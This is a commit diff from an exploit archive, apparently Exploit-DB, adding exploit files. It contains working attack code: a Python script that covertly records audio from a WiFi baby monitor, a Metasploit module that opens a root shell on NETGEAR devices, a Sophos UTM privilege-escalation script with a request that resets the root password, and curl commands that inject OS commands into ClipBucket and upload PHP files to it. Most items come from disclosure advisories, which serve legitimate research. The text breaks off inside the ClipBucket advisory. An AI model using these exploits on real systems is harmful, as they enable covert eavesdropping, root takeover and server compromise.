DB: 2018-03-06
12 changes to exploits/shellcodes Suricata < 4.0.4 - IDS Detection Bypass ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions Xion 1.0.125 - '.m3u' Local SEH-Based Unicode Venetian Exploit Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow Sophos UTM 9.410 - 'loginuser' 'confd' Service Privilege Escalation Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record NETGEAR - 'TelnetEnable' Magic Packet (Metasploit) Joomla! Component Joomanager 2.0.0 - Arbitrary File Download Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC) Parallels Remote Application Server 15.5 - Path Traversal ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download
This commit is contained in:
parent
aee073fb7e
commit
6a017b10c8
11 changed files with 1617 additions and 2 deletions
166
exploits/android/remote/44242.md
Normal file
166
exploits/android/remote/44242.md
Normal file
|
@ -0,0 +1,166 @@
|
|||
Whilst analysing a number of free communication based applications on the Google Play Store, I took a look at WiFi Baby Monitor: Free & Lite (the free version of WiFi Baby Monitor). Although the premium version offered users the ability to specify a password to be used in the pairing process, the free version offered no such function.
|
||||
|
||||
Monitoring the traffic using Wireshark during the pairing process revealed:
|
||||
|
||||
- The initial connection is made on port 8257
|
||||
- To start the pairing process, the same sequence is sent each time
|
||||
- After the pairing process is finished, another connection is opened to port 8258, where the audio data will be transmitted
|
||||
- After the connection is made to port 8258, the connection on port 8257 is kept open and used as a heartbeat for the session
|
||||
- On the heartbeat connection, the client will periodically send 0x01 to the baby monitor (roughly once per second)
|
||||
|
||||
## Abusing The Protocol to Record Audio
|
||||
|
||||
With the pairing process reversed, it was possible to create a proof of concept which proved that it was possible to deploy a small program into a compromised network which would eavesdrop on a baby monitor and allow for an attacker to play the recording back at a later date at their discretion.
|
||||
|
||||
The [very hacky] proof of concept code can be found below:
|
||||
|
||||
```
|
||||
import socket
|
||||
import sys
|
||||
import time
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
print "Usage: python {file} target_ip [port]".format(file = sys.argv[0])
|
||||
exit(1)
|
||||
|
||||
target = sys.argv[1]
|
||||
port = 8257
|
||||
|
||||
if len(sys.argv) == 3:
|
||||
port = int(sys.argv[2])
|
||||
|
||||
s = socket.socket()
|
||||
s.connect((target, port))
|
||||
s.send('\x01')
|
||||
s.send('\x02\x64\x00\x00\x00\x13\x2b\x52\x65\x63\x65\x69\x76\x65\x72\x53' +
|
||||
'\x74\x61\x72\x74\x5f\x32\x2e\x30\x32\x00\x00\x00\x00\x03\x23\x31' +
|
||||
'\x30\x00\x00\x00\x00\x03\x23\x32\x30\x00\x00\x00\x00\x03\x23\x32' +
|
||||
'\x31\x00\x00\x00\x00\x03\x23\x32\x32\x00\x00\x00\x00\x03\x23\x32' +
|
||||
'\x33')
|
||||
|
||||
heartbeat_dump = open('dump.heartbeat.bin', 'wb')
|
||||
data_dump = open('dump.data.bin', 'wb')
|
||||
|
||||
has_data_socket = False
|
||||
data_socket = socket.socket()
|
||||
delta = 0
|
||||
|
||||
while True:
|
||||
time.sleep(1)
|
||||
data = s.recv(2048)
|
||||
if data is not None:
|
||||
heartbeat_dump.write(data)
|
||||
print '[*] Received {bytes} bytes on heartbeat socket'.format(bytes = len(data))
|
||||
s.send('\x01')
|
||||
|
||||
if has_data_socket:
|
||||
data = data_socket.recv(2048)
|
||||
if data is not None:
|
||||
data_dump.write(data)
|
||||
print '[*] Received {bytes} bytes on data socket'.format(bytes = len(data))
|
||||
data_socket.send('\x01')
|
||||
else:
|
||||
print '[*] Establishing data connection'
|
||||
data_socket.connect((target, 8258))
|
||||
data_socket.send('\x01')
|
||||
data_socket.send('\x02\x64\x00\x00\x00\x07\x33\x5f\x5f\x30\x30\x30\x30')
|
||||
has_data_socket = True
|
||||
print '[*] Established data connection'
|
||||
|
||||
delta += 1
|
||||
|
||||
heartbeat_dump.close
|
||||
data_dump.close
|
||||
```
|
||||
|
||||
This script establishes a connection to the baby monitor and begins to dump out the data from port 8257 to dump.heartbeat.bin and the data from port 8258 to dump.data.bin.
|
||||
|
||||
Replaying the Recordings
|
||||
In order to replay the recordings made by the proof of concept, I created a second script which would act as a baby monitor and replay the data back to a client; which allows for replay via the original application:
|
||||
|
||||
```
|
||||
import socket
|
||||
import sys
|
||||
import time
|
||||
|
||||
s = socket.socket()
|
||||
s.bind(('0.0.0.0', 8257))
|
||||
s.listen(5)
|
||||
print '[*] Heartbeat socket listening on port 8257'
|
||||
|
||||
data_socket = socket.socket()
|
||||
data_socket.bind(('0.0.0.0', 8258))
|
||||
data_socket.listen(5)
|
||||
print '[*] Data socket listening on port 8258'
|
||||
|
||||
data = ''
|
||||
with open('dump.heartbeat.bin', 'r') as replay_file:
|
||||
data = replay_file.read()
|
||||
|
||||
wav_data = ''
|
||||
with open('dump.data.bin', 'r') as wav_file:
|
||||
wav_data = wav_file.read()
|
||||
|
||||
c, addr = s.accept()
|
||||
print '[*] Connection from {client}'.format(client = addr)
|
||||
c.send(data)
|
||||
|
||||
data_connection, addr = data_socket.accept()
|
||||
print '[*] Data connection from {client}'.format(client = addr)
|
||||
data_connection.send(wav_data)
|
||||
|
||||
buf_start = 0
|
||||
buf_end = wav_data.find('\x00\x00\x00\x01', 1)
|
||||
buf = wav_data[buf_start:buf_end]
|
||||
|
||||
while buf is not None:
|
||||
c.send('\x01')
|
||||
print '[*] Sending {bytes} bytes'.format(bytes = len(buf))
|
||||
data_connection.send(buf)
|
||||
time.sleep(0.1)
|
||||
|
||||
if buf_end == -1 or buf_start == -1:
|
||||
buf = None
|
||||
else:
|
||||
buf_start = buf_end
|
||||
buf_end = wav_data.find('\x00\x00\x00\x01', buf_end + 1)
|
||||
if buf_end == -1:
|
||||
buf = wav_data[buf_start:]
|
||||
else:
|
||||
buf = wav_data[buf_start:buf_end]
|
||||
|
||||
data_connection.close()
|
||||
c.close()
|
||||
print '[*] Connection closed'
|
||||
```
|
||||
|
||||
A demonstration of the replay script accepting a connection from a client and replaying a recording can be seen below:
|
||||
|
||||
https://vimeo.com/258487598
|
||||
|
||||
## Solution
|
||||
|
||||
When notified, the vendor took the [respectably] responsible approach and made available to the free version the security features that were previously exclusive to the premium version.
|
||||
|
||||
To prevent this attack, users can simply update to the latest version of the application (v2.02.2, at the time of writing this).
|
||||
|
||||
## CVE-ID
|
||||
|
||||
CVE-2018-7661
|
||||
|
||||
## CVSS Score
|
||||
|
||||
CVSS Base Score: 5.9
|
||||
Impact Subscore: 4.2
|
||||
Exploitability Subscore: 1.6
|
||||
CVSS Temporal Score: 5.3
|
||||
Overall CVSS Score: 5.3
|
||||
Vector: AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H/E:P/RL:O/RC:C
|
||||
|
||||
## Disclosure Timeline
|
||||
|
||||
2018-02-11: Initial contact with vendor to make them aware of the attack vector
|
||||
2018-02-12: Vendor acknowledged the issue and provided keys to test the premium version to verify the encryption and password protection would resolve the issue
|
||||
2018-02-15: Confirmation sent to vendor to let them know the proposed solution should nullify the attack
|
||||
2018-02-16: Vendor begins roll-out process for the new update
|
||||
2018-02-22: Roll-out process completed and version 2.02.2 made available to the public
|
242
exploits/hardware/remote/44245.rb
Executable file
242
exploits/hardware/remote/44245.rb
Executable file
|
@ -0,0 +1,242 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Udp
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Capture
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'NETGEAR TelnetEnable',
|
||||
'Description' => %q{
|
||||
This module sends a magic packet to a NETGEAR device to enable telnetd.
|
||||
Upon successful connect, a root shell should be presented to the user.
|
||||
},
|
||||
'Author' => [
|
||||
'Paul Gebheim', # Python PoC (TCP)
|
||||
'insanid', # Python PoC (UDP)
|
||||
'wvu', # Metasploit module
|
||||
],
|
||||
'References' => [
|
||||
['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'],
|
||||
['URL', 'https://github.com/cyanitol/netgear-telenetenable'],
|
||||
['URL', 'https://github.com/insanid/netgear-telenetenable']
|
||||
],
|
||||
'DisclosureDate' => 'Oct 30 2009', # Python PoC (TCP)
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Privileged' => true,
|
||||
'Payload' => {
|
||||
'Compat' => {
|
||||
'PayloadType' => 'cmd_interact',
|
||||
'ConnectionType' => 'find'
|
||||
}
|
||||
},
|
||||
'Targets' => [
|
||||
['Automatic (detect TCP or UDP)',
|
||||
proto: :auto
|
||||
],
|
||||
['TCP (typically older devices)',
|
||||
proto: :tcp,
|
||||
username: 'Gearguy',
|
||||
password: 'Geardog'
|
||||
],
|
||||
['UDP (typically newer devices)',
|
||||
proto: :udp,
|
||||
username: 'admin',
|
||||
password: 'password'
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options([
|
||||
Opt::RPORT(23),
|
||||
OptString.new('MAC', [false, 'MAC address of device']),
|
||||
OptString.new('USERNAME', [false, 'Username on device']),
|
||||
OptString.new('PASSWORD', [false, 'Password on device'])
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
# Run through protocol detection
|
||||
detect_proto
|
||||
|
||||
# This is a gamble, but it's the closest we can get
|
||||
if @proto == :tcp
|
||||
CheckCode::Detected
|
||||
else
|
||||
CheckCode::Unknown
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
# Try to do the exploit unless telnetd is detected
|
||||
@do_exploit = true
|
||||
|
||||
# Detect TCP or UDP and presence of telnetd
|
||||
@proto = target[:proto]
|
||||
detect_proto if @proto == :auto
|
||||
|
||||
# Use supplied or ARP-cached MAC address
|
||||
configure_mac if @do_exploit
|
||||
|
||||
# Use supplied or default creds
|
||||
configure_creds if @do_exploit
|
||||
|
||||
# Shell it
|
||||
exploit_telnetenabled if @do_exploit
|
||||
connect_telnetd
|
||||
end
|
||||
|
||||
def detect_proto
|
||||
begin
|
||||
connect
|
||||
|
||||
res = begin
|
||||
sock.get_once || ''
|
||||
rescue EOFError
|
||||
''
|
||||
end
|
||||
|
||||
# telnetenabled returns no data, unlike telnetd
|
||||
if res.length == 0
|
||||
print_good('Detected telnetenabled on TCP')
|
||||
else
|
||||
print_good('Detected telnetd on TCP')
|
||||
@do_exploit = false
|
||||
end
|
||||
|
||||
@proto = :tcp
|
||||
# It's UDP... and we may not get an ICMP error...
|
||||
rescue Rex::ConnectionError
|
||||
print_good('Detected telnetenabled on UDP')
|
||||
@proto = :udp
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
||||
def configure_mac
|
||||
@mac = datastore['MAC']
|
||||
|
||||
return if @mac
|
||||
|
||||
print_status('Attempting to discover MAC address via ARP')
|
||||
|
||||
begin
|
||||
open_pcap
|
||||
@mac = lookup_eth(rhost).first
|
||||
rescue RuntimeError
|
||||
fail_with(Failure::BadConfig, 'Superuser access required')
|
||||
ensure
|
||||
close_pcap
|
||||
end
|
||||
|
||||
if @mac
|
||||
print_good("Found MAC address #{@mac}")
|
||||
else
|
||||
fail_with(Failure::Unknown, 'Could not find MAC address')
|
||||
end
|
||||
end
|
||||
|
||||
def configure_creds
|
||||
@username = datastore['USERNAME'] || target[:username]
|
||||
@password = datastore['PASSWORD'] || target[:password]
|
||||
|
||||
# Try to use default creds if no creds were found
|
||||
unless @username && @password
|
||||
tgt = targets.find { |t| t[:proto] == @proto }
|
||||
@username = tgt[:username]
|
||||
@password = tgt[:password]
|
||||
end
|
||||
|
||||
print_good("Using creds #{@username}:#{@password}")
|
||||
end
|
||||
|
||||
def exploit_telnetenabled
|
||||
print_status('Generating magic packet')
|
||||
payload = magic_packet(@mac, @username, @password)
|
||||
|
||||
begin
|
||||
print_status("Connecting to telnetenabled via #{@proto.upcase}")
|
||||
@proto == :tcp ? connect : connect_udp
|
||||
print_status('Sending magic packet')
|
||||
@proto == :tcp ? sock.put(payload) : udp_sock.put(payload)
|
||||
rescue Rex::ConnectionError
|
||||
fail_with(Failure::Disconnected, 'Something happened mid-connection!')
|
||||
ensure
|
||||
print_status('Disconnecting from telnetenabled')
|
||||
@proto == :tcp ? disconnect : disconnect_udp
|
||||
end
|
||||
|
||||
# Wait a couple seconds for telnetd to come up
|
||||
print_status('Waiting for telnetd')
|
||||
sleep(2)
|
||||
end
|
||||
|
||||
def connect_telnetd
|
||||
print_status('Connecting to telnetd')
|
||||
connect
|
||||
handler(sock)
|
||||
end
|
||||
|
||||
# NOTE: This is almost a verbatim copy of the Python PoC
|
||||
def magic_packet(mac, username, password)
|
||||
mac = mac.gsub(/[:-]/, '').upcase
|
||||
|
||||
if mac.length != 12
|
||||
fail_with(Failure::BadConfig, 'MAC must be 12 bytes without : or -')
|
||||
end
|
||||
just_mac = mac.ljust(0x10, "\x00")
|
||||
|
||||
if username.length > 0x10
|
||||
fail_with(Failure::BadConfig, 'USERNAME must be <= 16 bytes')
|
||||
end
|
||||
just_username = username.ljust(0x10, "\x00")
|
||||
|
||||
if @proto == :tcp
|
||||
if password.length > 0x10
|
||||
fail_with(Failure::BadConfig, 'PASSWORD must be <= 16 bytes')
|
||||
end
|
||||
just_password = password.ljust(0x10, "\x00")
|
||||
elsif @proto == :udp
|
||||
# Thanks to Roberto Frenna for the reserved field analysis
|
||||
if password.length > 0x21
|
||||
fail_with(Failure::BadConfig, 'PASSWORD must be <= 33 bytes')
|
||||
end
|
||||
just_password = password.ljust(0x21, "\x00")
|
||||
end
|
||||
|
||||
cleartext = (just_mac + just_username + just_password).ljust(0x70, "\x00")
|
||||
md5_key = Rex::Text.md5_raw(cleartext)
|
||||
|
||||
payload = byte_swap((md5_key + cleartext).ljust(0x80, "\x00"))
|
||||
|
||||
secret_key = 'AMBIT_TELNET_ENABLE+' + password
|
||||
|
||||
byte_swap(blowfish_encrypt(secret_key, payload))
|
||||
end
|
||||
|
||||
def blowfish_encrypt(secret_key, payload)
|
||||
cipher = OpenSSL::Cipher.new('bf-ecb').encrypt
|
||||
|
||||
cipher.padding = 0
|
||||
cipher.key_len = secret_key.length
|
||||
cipher.key = secret_key
|
||||
|
||||
cipher.update(payload) + cipher.final
|
||||
end
|
||||
|
||||
def byte_swap(data)
|
||||
data.unpack('N*').pack('V*')
|
||||
end
|
||||
|
||||
end
|
183
exploits/linux/local/44246.txt
Normal file
183
exploits/linux/local/44246.txt
Normal file
|
@ -0,0 +1,183 @@
|
|||
KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service
|
||||
|
||||
Title: Sophos UTM 9 loginuser Privilege Escalation via confd Service
|
||||
Advisory ID: KL-001-2018-007
|
||||
Publication Date: 2018.03.02
|
||||
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-007.txt
|
||||
|
||||
|
||||
1. Vulnerability Details
|
||||
|
||||
Affected Vendor: Sophos
|
||||
Affected Product: UTM 9
|
||||
Affected Version: 9.410
|
||||
Platform: Embedded Linux
|
||||
CWE Classification: CWE-306: Missing Authentication for Critical Function (SID generation)
|
||||
Impact: Privilege Escalation
|
||||
Attack vector: SSH
|
||||
|
||||
2. Vulnerability Description
|
||||
|
||||
The attacker must know the password for the loginuser
|
||||
account. The confd client is not available to the loginuser
|
||||
account. However, the running service is accessible over
|
||||
a network port on the loopback interface. By replaying the
|
||||
network traffic required to obtain a SID from this service it
|
||||
is possible to escalate privileges to root.
|
||||
|
||||
3. Technical Description
|
||||
|
||||
1. Obtain the a privileged session token
|
||||
|
||||
$ ssh -Nf -L 127.0.0.1:4472:127.0.0.1:4472 loginuser@1.3.3.7
|
||||
loginuser@1.3.3.7's password:
|
||||
$ python kl-loginuser-confd-priv_esc.py
|
||||
pojiZSqWEUAUDNIQtSop
|
||||
|
||||
2. Using that session token, set the root password
|
||||
|
||||
POST /webadmin.plx HTTP/1.1
|
||||
Host: 1.3.3.7:4444
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0
|
||||
Accept: text/javascript, text/html, application/xml, text/xml, */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
X-Requested-With: XMLHttpRequest
|
||||
X-Prototype-Version: 1.5.1.1
|
||||
Content-Type: application/json; charset=UTF-8
|
||||
Referer: https://1.3.3.7:4444/
|
||||
Content-Length: 422
|
||||
Cookie: SID=pojiZSqWEUAUDNIQtSop
|
||||
DNT: 1
|
||||
Connection: close
|
||||
|
||||
{"objs": [{"ack": null, "elements": {"root_pw_1": "korelogic", "root_pw_2": "korelogic", "loginuser_pw_1":
|
||||
"loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "pojiZSqWEUAUDNIQtSop", "browser":
|
||||
"gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID":
|
||||
"1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false}
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Thu, 23 Mar 2017 15:33:53 GMT
|
||||
Server: Apache
|
||||
Expires: Thursday, 01-Jan-1970 00:00:01 GMT
|
||||
Pragma: no-cache
|
||||
X-Frame-Options: SAMEORIGIN
|
||||
X-Content-Type-Option: nosniff
|
||||
X-XSS-Protection: 1; mode=block
|
||||
Vary: Accept-Encoding
|
||||
Connection: close
|
||||
Content-Type: application/json; charset=utf-8
|
||||
Content-Length: 178895
|
||||
|
||||
{"SID":"pojiZSqWEUAUDNIQtSop","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",[snip over 9000]
|
||||
|
||||
3. Look for success message.
|
||||
|
||||
"objs":[{"success":[{"text":"Shell user password(s) set successfully."}]
|
||||
|
||||
4. Profit.
|
||||
|
||||
loginuser@[redacted]:/home/login > su
|
||||
Password:
|
||||
[redacted]:/home/login # id
|
||||
uid=0(root) gid=0(root) groups=0(root),890(xorp)
|
||||
|
||||
4. Mitigation and Remediation Recommendation
|
||||
|
||||
The vendor has addressed this vulnerability in version
|
||||
9.508. Release notes and download instructions can be found at:
|
||||
|
||||
https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-508-released
|
||||
|
||||
|
||||
5. Credit
|
||||
|
||||
This vulnerability was discovered by Matt Bergin (@thatguylevel)
|
||||
of KoreLogic, Inc.
|
||||
|
||||
6. Disclosure Timeline
|
||||
|
||||
2017.07.21 - KoreLogic submits vulnerability details to Sophos.
|
||||
2017.07.21 - Sophos acknowledges receipt.
|
||||
2017.09.01 - 30 business days have elapsed since the vulnerability
|
||||
was reported to Sophos.
|
||||
2017.09.15 - KoreLogic requests an update on the status of this and
|
||||
other vulnerabilities reported to Sophos.
|
||||
2017.09.18 - Sophos informs KoreLogic that this issue will require
|
||||
additional engineering and requests an extension of
|
||||
the disclosure timeline.
|
||||
2017.09.25 - 45 business days have elapsed since the vulnerability
|
||||
was reported to Sophos.
|
||||
2017.11.07 - 75 business days have elapsed since the vulnerability
|
||||
was reported to Sophos.
|
||||
2017.12.14 - 100 business days have elapsed since the vulnerability
|
||||
was reported to Sophos.
|
||||
2018.01.12 - KoreLogic requests an update from Sophos.
|
||||
2018.01.15 - Sophos informs KoreLogic that the expected release date
|
||||
for the UTM 9.5 MR 6 version containing the mitigation
|
||||
is the middle of February.
|
||||
2018.01.16 - 120 business days have elapsed since the vulnerability
|
||||
was reported to Sophos.
|
||||
2018.02.28 - 150 business days have elapsed since the vulnerability
|
||||
was reported to Sophos.
|
||||
2018.03.01 - UTM 9.508 released by Sophos.
|
||||
2018.03.02 - KoreLogic public disclosure.
|
||||
|
||||
7. Proof of Concept
|
||||
|
||||
from socket import socket,AF_INET,SOCK_STREAM
|
||||
|
||||
class Exploit:
|
||||
def __init__(self):
|
||||
self.host = '127.0.0.1'
|
||||
self.port = 4472
|
||||
self.connected = False
|
||||
self.s = None
|
||||
return None
|
||||
def disconnect(self):
|
||||
self.s.close()
|
||||
return True
|
||||
def send_trigger(self):
|
||||
packet_one =
|
||||
'00000039050702000000050a0a43616c6c4d6574686f6404110b41737461726f3a3a52504303000000000a036765740a04697076360a06737461747573'.decode('hex')
|
||||
self.s.send(packet_one)
|
||||
self.s.recv(4096)
|
||||
packet_two =
|
||||
'00000099050702000000040a094e657748616e646c650a037379730a036e65770403000000060a0f636f6e66642d636c69656e742e706c00000006636c69656e7417000000000870617373776f72640a093132372e302e302e31000000066173675f69700a093132372e302e302e31000000026970170673797374656d00000008757365726e616d65170673797374656d00000008666163696c697479'.decode('hex')
|
||||
self.s.send(packet_two)
|
||||
self.s.recv(4096)
|
||||
packet_three =
|
||||
'0000002f05070200000003170a43616c6c4d6574686f6404110b41737461726f3a3a525043030000000017076765745f534944'.decode('hex')
|
||||
self.s.send(packet_three)
|
||||
print self.s.recv(4096).strip()
|
||||
return True
|
||||
def connect(self):
|
||||
self.s = socket(AF_INET, SOCK_STREAM)
|
||||
self.s.connect((self.host,self.port))
|
||||
self.connected = True
|
||||
return True
|
||||
def run(self):
|
||||
self.connect()
|
||||
self.send_trigger()
|
||||
self.disconnect()
|
||||
return True
|
||||
|
||||
if __name__=="__main__":
|
||||
Exploit().run()
|
||||
|
||||
|
||||
The contents of this advisory are copyright(c) 2018
|
||||
KoreLogic, Inc. and are licensed under a Creative Commons
|
||||
Attribution Share-Alike 4.0 (United States) License:
|
||||
http://creativecommons.org/licenses/by-sa/4.0/
|
||||
|
||||
KoreLogic, Inc. is a founder-owned and operated company with a
|
||||
proven track record of providing security services to entities
|
||||
ranging from Fortune 500 to small and mid-sized companies. We
|
||||
are a highly skilled team of senior security consultants doing
|
||||
by-hand security assessments for the most important networks in
|
||||
the U.S. and around the world. We are also developers of various
|
||||
tools and resources aimed at helping the security community.
|
||||
https://www.korelogic.com/about-korelogic.html
|
||||
|
||||
Our public vulnerability disclosure policy is available at:
|
||||
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
|
57
exploits/multiple/dos/44247.txt
Normal file
57
exploits/multiple/dos/44247.txt
Normal file
|
@ -0,0 +1,57 @@
|
|||
-----------------------------------------------------
|
||||
Vulnerability Type: Detection Bypass
|
||||
Affected Product: Suricata
|
||||
Vulnerable version: <4.0.4
|
||||
CVE number: CVE-2018-6794
|
||||
Found: 25.01.2018
|
||||
By: Kirill Shipulin (@kirill_wow), Positive Technologies
|
||||
Severity: Medium
|
||||
------------------------------------------
|
||||
|
||||
About Suricata:
|
||||
---------------
|
||||
Suricata is a high performance Network Threat Detection, IDS, IPS and Network Security Monitoring engine. Open Source and owned by a community run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by the OISF, its supporting vendors and the community
|
||||
|
||||
Attack Description:
|
||||
-------------------
|
||||
If as a server side you break a normal TCP 3 way handshake packets order and inject some response data before 3whs is complete then data still will be received by the a client but some IDS engines may skip content checks on that.
|
||||
|
||||
Attack scenario TCP flow scheme:
|
||||
Client -> [SYN] [Seq=0 Ack= 0] -> Evil Server
|
||||
Client <- [SYN, ACK] [Seq=0 Ack= 1] <- Evil Server
|
||||
Client <- [PSH, ACK] [Seq=1 Ack= 1] <- Evil Server # Injection before the 3whs is completed
|
||||
Client <- [FIN, ACK] [Seq=83 Ack= 1] <- Evil Server
|
||||
Client -> [ACK] [Seq=1 Ack= 84] -> Evil Server
|
||||
Client -> [PSH, ACK] [Seq=1 Ack= 84] -> Evil Server
|
||||
|
||||
IDS signature checks for tcp stream or http response body will be skipped in the case of data injection. This attack technique requires all three packets from a malicious server to be received by a client side together before it completes 3whs. Proof of concept server was written in C to reproduce this and it works reliably in local networks. Since some network devices may affect packets transmission exploitation is not so reliable for the internet scenario.
|
||||
|
||||
This attack possibly may impact other network monitoring or intrusion detection systems because is not limited to Suricata IDS: an old Snort IDS version 2.9.4 is also affected.
|
||||
|
||||
Successful exploitation leads to a complete TCP-Stream response or HTTP response signatures bypass and may be used to prevent malicious payloads from network detection.
|
||||
|
||||
PoС:
|
||||
----
|
||||
A Working PoC server is available here: https://github.com/kirillwow/ids_bypass
|
||||
There is also a traffic capture of this data injection technique.
|
||||
|
||||
Timeline Summary:
|
||||
-----------------
|
||||
2018-01-25: Issue submitted to the bug tracker.
|
||||
2018-01-30: Patch ready.
|
||||
2018-02-14: Suricata 4.0.4 containing the fix has been released.
|
||||
|
||||
References:
|
||||
-----------
|
||||
CVE-2018-6794
|
||||
https://redmine.openinfosecfoundation.org/issues/2427
|
||||
|
||||
Contacts:
|
||||
---------
|
||||
Twitter: https://twitter.com/AttackDetection
|
||||
Twitter: https://twitter.com/kirill_wow
|
||||
Telegram: https://t.me/kirill_wow
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44247.zip
|
245
exploits/php/webapps/44250.txt
Normal file
245
exploits/php/webapps/44250.txt
Normal file
|
@ -0,0 +1,245 @@
|
|||
SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >
|
||||
=======================================================================
|
||||
title: OS command injection, arbitrary file upload & SQL injection
|
||||
product: ClipBucket
|
||||
vulnerable version: <4.0.0 - Release 4902
|
||||
fixed version: 4.0.0 - Release 4902
|
||||
CVE number: -
|
||||
impact: critical
|
||||
homepage: http://clipbucket.com/
|
||||
found: 2017-09-06
|
||||
by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
|
||||
Wan Ikram (Office Kuala Lumpur)
|
||||
Fikri Fadzil (Office Kuala Lumpur)
|
||||
Jasveer Singh (Office Kuala Lumpur)
|
||||
SEC Consult Vulnerability Lab
|
||||
|
||||
An integrated part of SEC Consult
|
||||
Bangkok - Berlin - Linz - Luxembourg - Montreal
|
||||
Moscow - Munich - Kuala Lumpur - Singapore
|
||||
Vienna (HQ) - Vilnius - Zurich
|
||||
|
||||
https://www.sec-consult.com
|
||||
|
||||
=======================================================================
|
||||
|
||||
Vendor description:
|
||||
-------------------
|
||||
"ClipBucket is a free and open source software which helps us to create a
|
||||
complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu
|
||||
in few minutes of setup. It was first created in 2007 by Arslan Hassan and his
|
||||
team of developers. ClipBucket was developed as a YouTube clone but has been
|
||||
upgraded with advanced features and enhancements. It uses FFMPEG for video
|
||||
conversion and thumbs generation which is the most widely used application so,
|
||||
users can stream it straight away using the Video JS and HTML 5 Players."
|
||||
|
||||
Source: https://clipbucket.com/about
|
||||
|
||||
|
||||
Business recommendation:
|
||||
------------------------
|
||||
By exploiting the vulnerabilities documented in this advisory, an attacker can
|
||||
fully compromise the web server which has ClipBucket installed. Potentially
|
||||
sensitive data might get exposed through this attack.
|
||||
|
||||
Users are advised to immediately install the patched version provided by the
|
||||
vendor.
|
||||
|
||||
|
||||
Vulnerability overview/description:
|
||||
-----------------------------------
|
||||
1. Unauthenticated OS Command Injection
|
||||
Any OS commands can be injected by an unauthenticated attacker. This is a serious
|
||||
vulnerability as the chances for the system to be fully compromised is very
|
||||
high. This same vulnerability can also be exploited by authenticated attackers
|
||||
with normal user privileges.
|
||||
|
||||
2. Unauthenticated Arbitrary File Upload
|
||||
A malicious file can be uploaded into the webserver by an unauthenticated
|
||||
attacker. It is possible for an attacker to upload a script to issue operating
|
||||
system commands. This same vulnerability can also be exploited by an
|
||||
authenticated attacker with normal user privileges.
|
||||
|
||||
3. Unauthenticated Blind SQL Injection
|
||||
The identified SQL injection vulnerabilities enable an attacker to execute
|
||||
arbitrary SQL commands on the underlying MySQL server.
|
||||
|
||||
|
||||
Proof of concept:
|
||||
-----------------
|
||||
1. Unauthenticated OS Command Injection
|
||||
Without having to authenticate, an attacker can exploit this vulnerability
|
||||
by manipulating the "file_name" parameter during the file upload in the script
|
||||
/api/file_uploader.php:
|
||||
|
||||
$ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||<<COMMAND HERE>>"
|
||||
http://$HOST/api/file_uploader.php
|
||||
|
||||
|
||||
Alternatively, this vulnerability can also be exploited by authenticated basic
|
||||
privileged users with the following payload by exploiting the same issue in
|
||||
/actions/file_downloader.php:
|
||||
|
||||
$ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4&file_name=abc
|
||||
|| <<COMMAND HERE>>" "http://$HOST/actions/file_downloader.php"
|
||||
|
||||
|
||||
2. Unauthenticated Arbitrary File Upload
|
||||
Below is the cURL request to upload arbitrary files to the webserver with no
|
||||
authentication required.
|
||||
|
||||
$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
|
||||
"http://$HOST/actions/beats_uploader.php"
|
||||
|
||||
$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
|
||||
"http://$HOST/actions/photo_uploader.php"
|
||||
|
||||
Furthermore, this vulnerability is also available to authenticated users with
|
||||
basic privileges:
|
||||
|
||||
$ curl --cookie "[--SNIP--]" -F
|
||||
"coverPhoto=@valid-image-with-appended-phpcode.php"
|
||||
"http://$HOST/edit_account.php?mode=avatar_bg"
|
||||
|
||||
|
||||
3. Unauthenticated Blind SQL Injection
|
||||
The following parameters have been identified to be vulnerable against
|
||||
unauthenticated blind SQL injection.
|
||||
|
||||
URL : http://$HOST/actions/vote_channel.php
|
||||
METHOD : POST
|
||||
